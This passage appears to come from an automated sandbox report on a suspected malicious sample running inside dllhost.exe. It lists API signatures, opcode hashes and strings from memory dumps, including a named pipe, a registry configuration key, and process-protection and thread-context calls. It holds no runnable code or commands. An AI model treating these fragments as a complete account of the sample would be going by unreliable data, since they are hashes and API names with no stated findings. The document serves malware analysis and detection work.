                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction ID: e4926d40a2777414ecc550edc466defc16cd18dc11c5b572a88cc8e23d246ce6
                                                  • Opcode Fuzzy Hash: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction Fuzzy Hash: 7B31F723A04B4096F710DF22E80C359A3B0F74ABD9F659A27DE4983625DF38D85AC340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction ID: 955b9a80d78d02075b80cef2809c1815632d9e92b0cb2ffe4098657e7f858923
                                                  • Opcode Fuzzy Hash: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction Fuzzy Hash: 77318732A10B4186EB50DF66A84C75967B0F786F98F24AA27DE4A83725DF38D846C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                  • String ID:
                                                  • API String ID: 4184240511-0
                                                  • Opcode ID: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                  • Instruction ID: 0e6833bd3eeca7de3220de005558475a35c56d9be5ad7e086776b2a4e8a7938b
                                                  • Opcode Fuzzy Hash: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                  • Instruction Fuzzy Hash: 894147B2700A859AE711CF6AE8843DD73B1FB89B89F445225FF0A43A69DF38C159C304
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 1a69dcc4a857e1a8acaf5f70824e8ee75a6218c9c0f8a8e2485de44cbd3ea7a5
                                                  • Instruction ID: 6172b0832d444610f2c001c2046573fd54cd763875f8c3d528f4c7c6fc1acbd2
                                                  • Opcode Fuzzy Hash: 1a69dcc4a857e1a8acaf5f70824e8ee75a6218c9c0f8a8e2485de44cbd3ea7a5
                                                  • Instruction Fuzzy Hash: 5CD1BF32640B508AEB60DF25D48939D77A0F756B8CF202A17EE89D7B95DF34D991C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction ID: fa0c27e38a77a140ddfa905e5434e6e95bdb256ee49fe4da3a8a4127ea64b14c
                                                  • Opcode Fuzzy Hash: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction Fuzzy Hash: BDD1AF32A10B408AEB609FA5D44839D77B4F75678CF202A17EF8997B9ADF34D891C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeLibraryProc
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3013587201-537541572
                                                  • Opcode ID: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction ID: 5fa746dbd0509b5e7999beb395933bc3fa40dd5226786bda54d596fcf04f82ee
                                                  • Opcode Fuzzy Hash: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction Fuzzy Hash: DB412521B11A0081FA16CB26A80C79927A1B707BE8F69AA27DD0DC7795EF3DDC458300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                  • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                                  • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                  • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction ID: 5b658cbe667a55b142761c831cff27a31785e4e4b61e8cc0462ed735cd215b5c
                                                  • Opcode Fuzzy Hash: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction Fuzzy Hash: 1B417473614B80C6E750CF61E44879E7BB1F38AB98F54962ADB8947758DF38D849CB00
                                                  APIs
                                                  • FlsGetValue.KERNEL32(?,?,?,000002D8B0A6D12E,?,?,?,?,?,?,?,?,000002D8B0A6D8ED,?,?,00000001), ref: 000002D8B0A6D9D7
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A6D12E,?,?,?,?,?,?,?,?,000002D8B0A6D8ED,?,?,00000001), ref: 000002D8B0A6D9F6
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A6D12E,?,?,?,?,?,?,?,?,000002D8B0A6D8ED,?,?,00000001), ref: 000002D8B0A6DA1E
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A6D12E,?,?,?,?,?,?,?,?,000002D8B0A6D8ED,?,?,00000001), ref: 000002D8B0A6DA2F
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A6D12E,?,?,?,?,?,?,?,?,000002D8B0A6D8ED,?,?,00000001), ref: 000002D8B0A6DA40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID: 1%$Y%
                                                  • API String ID: 3702945584-1395475152
                                                  • Opcode ID: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction ID: d055be73e69dab1435da9d20c6e830ef5023d67133ad1ad1cd962f99aff0c8d8
                                                  • Opcode Fuzzy Hash: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction Fuzzy Hash: CD115E20F0924041FA58976166A937921B27B577F8F387F27E93EC76D6DE28CC429200
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\x4childproc
                                                  • API String ID: 166002920-1140171592
                                                  • Opcode ID: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction ID: 44ba1a7d3079436f3fa7e80ef8c718692f06103491f5c1dd9dcc18cb8c987de5
                                                  • Opcode Fuzzy Hash: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction Fuzzy Hash: 83114C32614B4082F7108B25F50875A7760F38AB98F609627EA5946BA8DF7CC549CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction ID: 6d092dda3596586190b0919a2179161064e56d520f8e6a2cc96985cb664cd209
                                                  • Opcode Fuzzy Hash: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction Fuzzy Hash: 6881D161E2020186FA50AB65944D3AD66F0BB87B8CF74FD27DA09C739BDE39ED458700
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002D8B0A6A6E7,?,?,?,000002D8B0A6911C,?,?,?,?,000002D8B0A68C25), ref: 000002D8B0A6A5AD
                                                  • GetLastError.KERNEL32(?,?,?,000002D8B0A6A6E7,?,?,?,000002D8B0A6911C,?,?,?,?,000002D8B0A68C25), ref: 000002D8B0A6A5BB
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002D8B0A6A6E7,?,?,?,000002D8B0A6911C,?,?,?,?,000002D8B0A68C25), ref: 000002D8B0A6A5E5
                                                  • FreeLibrary.KERNEL32(?,?,?,000002D8B0A6A6E7,?,?,?,000002D8B0A6911C,?,?,?,?,000002D8B0A68C25), ref: 000002D8B0A6A653
                                                  • GetProcAddress.KERNEL32(?,?,?,000002D8B0A6A6E7,?,?,?,000002D8B0A6911C,?,?,?,?,000002D8B0A68C25), ref: 000002D8B0A6A65F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction ID: 50ddfac7a0dbab774daa5a75481b61811a2f0ea3631faa7747b3fbd6f9126202
                                                  • Opcode Fuzzy Hash: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction Fuzzy Hash: 0031E621B02A4091EE12DB16E80875967A4B716BA8F7DAE37DD2E87390DF38DC458B10
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction ID: 5eff0312d68e16446c2b121efd56d942e50b87ddcb777448109575c7f1d4c8de
                                                  • Opcode Fuzzy Hash: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction Fuzzy Hash: C611B631310B4082E7548B16F858319B7A4F78AFE9F209627EA5EC7BA6DF38CC058740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID: wr
                                                  • API String ID: 1092925422-2678910430
                                                  • Opcode ID: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction ID: 9d058639985b636ca8578305fe41ce89e7279f64aa92cf0e6edcd5aaedf329aa
                                                  • Opcode Fuzzy Hash: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction Fuzzy Hash: CF11A12670074082FB14AB25F40826E67B0F74AB98F24983BDE8D83795EF3DC94AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Delete$CloseEnumOpen
                                                  • String ID: SOFTWARE\x4config
                                                  • API String ID: 3013565938-4086921495
                                                  • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                  • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                  • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                  • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 3c71be769f0a5cb5e2c769ed66c005fe4416e84d447ca1635e312c6679bbf07e
                                                  • Instruction ID: 3b7f3f3b14d739e038f0fc077c0b73160f2604ccde326808cc2c00182d5d68a8
                                                  • Opcode Fuzzy Hash: 3c71be769f0a5cb5e2c769ed66c005fe4416e84d447ca1635e312c6679bbf07e
                                                  • Instruction Fuzzy Hash: F5D19A76605B8886DB70DB16E49835A77B0F3CAB88F215517EA8D877A5DF3CC941CB00
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,000002D8B0A6E005,?,?,?,?,000002D8B0A6E0C8), ref: 000002D8B0A6D8FF
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A6E005,?,?,?,?,000002D8B0A6E0C8), ref: 000002D8B0A6D935
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A6E005,?,?,?,?,000002D8B0A6E0C8), ref: 000002D8B0A6D962
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A6E005,?,?,?,?,000002D8B0A6E0C8), ref: 000002D8B0A6D973
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A6E005,?,?,?,?,000002D8B0A6E0C8), ref: 000002D8B0A6D984
                                                  • SetLastError.KERNEL32(?,?,?,000002D8B0A6E005,?,?,?,?,000002D8B0A6E0C8), ref: 000002D8B0A6D99F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2506987500-0
                                                  • Opcode ID: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction ID: fbc17d0f3c77ed6c16c2c7ae08d8c4bde14d516ed6f2f80913809072ec12e9cc
                                                  • Opcode Fuzzy Hash: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction Fuzzy Hash: 61115C21E0164041FA54A73166AD32D66B27B477F8F347F27E97AC6BD7DE288C419300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 6e434f9027214566f227db2d997bb0a869563547e9da787854957d847e80d4fa
                                                  • Instruction ID: d90609cdb4bf1e1b2b864a393aa86921c6c061d7ada9ebb914d9e5856d6fc63b
                                                  • Opcode Fuzzy Hash: 6e434f9027214566f227db2d997bb0a869563547e9da787854957d847e80d4fa
                                                  • Instruction Fuzzy Hash: 57016D61700A4082EB10DB12A49875A6BA5F789FC8F689837DE8983765DE3CC986C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
